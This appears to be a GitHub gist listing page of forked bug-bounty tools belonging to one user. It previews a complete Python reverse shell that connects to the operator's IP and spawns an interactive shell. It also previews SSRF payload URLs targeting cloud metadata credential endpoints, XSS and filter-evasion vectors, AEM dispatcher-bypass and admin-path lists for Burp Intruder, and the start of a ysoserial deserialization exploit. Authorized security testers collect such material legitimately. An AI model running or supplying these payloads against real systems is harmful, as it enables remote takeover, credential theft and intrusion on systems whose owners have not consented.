This is a simple guide to perform javascript recon in the bugbounty
- The first step is to collect possibly several javascript files (
more files=more paths,parameters->more vulns)
Nasur Ullah Spy0x7
💢
Spy0x7
/ revsh.py
Created
September 8, 2021 18:16
— forked from omerxx/revsh.py
Reverse shell in python
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import socket,subprocess,os; | |
| s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); | |
| s.connect(("<my ip address>",2375)); | |
| os.dup2(s.fileno(),0); | |
| os.dup2(s.fileno(),1); | |
| os.dup2(s.fileno(),2); | |
| p=subprocess.call(["/bin/sh","-i"]); |
Spy0x7
/ file_extensions.txt
Created
August 15, 2021 07:18
— forked from BuffaloWill/file_extensions.txt
File Extension Dictionary (decent) Bruteforcing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| aw | |
| atom | |
| atomcat | |
| atomsvc | |
| ccxml | |
| cdmia | |
| cdmic | |
| cdmid | |
| cdmio | |
| cdmiq |
Spy0x7
/ cloud_metadata.txt
Created
August 15, 2021 07:17
— forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## IPv6 Tests | |
| http://[::ffff:169.254.169.254] | |
| http://[0:0:0:0:0:ffff:169.254.169.254] | |
| ## AWS | |
| # Amazon Web Services (No Header Required) | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] |
Spy0x7
/ xssmonkey.user.js
Created
August 9, 2021 06:23
— forked from thomashartm/xssmonkey.user.js
XSS testing userscript for GreaseMonkey to for XSS issues with links and forms in a page. Based on ph3wl's XSS script.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // ==UserScript== | |
| // @name XSSMonkey | |
| // @namespace thartm | |
| // @description Identifies potential Cross Site Scripting (XSS) sinks in the currently displayed website and provides an easy option to probe them. Based on ph3wl's XSS script. | |
| // @include * | |
| // @require http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js | |
| // ==/UserScript== | |
| // | |
| // Set your test string here |
Spy0x7
/ burp-intruder-aem-dispatcher-bypass.txt
Created
August 9, 2021 06:03
— forked from thomashartm/burp-intruder-aem-dispatcher-bypass.txt
Burp Intruder payload lists for AEM content grabbing URL suffixes to bypass dispatcher rules. Just copy the list into your intruder options.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .json | |
| .1.json | |
| .json/a.css | |
| .json/a.html | |
| .json/a.ico | |
| .json/a.png | |
| .json/a.gif | |
| .json/a.1.json | |
| .json;%0aa.css | |
| .json;%0aa.html |
Spy0x7
/ burp-intruder-aem-critical-paths.txt
Created
August 9, 2021 06:03
— forked from thomashartm/burp-intruder-aem-critical-paths.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /admin | |
| /system/console | |
| /dav/crx.default | |
| /crx | |
| /bin/crxde/logs | |
| /jcr:system/jcr:versionStorage.json | |
| /_jcr_system/_jcr_versionStorage.json | |
| /libs/wcm/core/content/siteadmin.html | |
| /libs/collab/core/content/admin.html | |
| /libs/cq/ui/content/dumplibs.html |
Spy0x7
/ XSS vectors and filter evasion strings
Created
August 9, 2021 06:02
— forked from thomashartm/XSS vectors and filter evasion strings
Interesting XSS payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| CUSTOM VECTORS | |
| "><img src=x onerror=prompt(1);> | |
| +123'];alert(1);[[' | |
| 123',alert(1),' | |
| 123\",term:alert(1)//\" |
Spy0x7
/ poc.py
Created
August 4, 2021 06:04
— forked from cube0x0/poc.py
poc for exploiting java serialization with ysoserial when encryption is enabled
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| import hashlib | |
| import os | |
| import argparse | |
| import base64 | |
| import pyDes | |
| import gzip | |
| import hmac | |
| import requests |
Spy0x7
/ subdomain_wordlist.md
Created
July 24, 2021 07:40
— forked from cihanmehmet/subdomain_wordlist.md
Subdomain Wordlist
cmd@fb:/tmp|❯ wc -l 33m-subdomain-wordlist.txt
33927885 33m-subdomain-wordlist.txt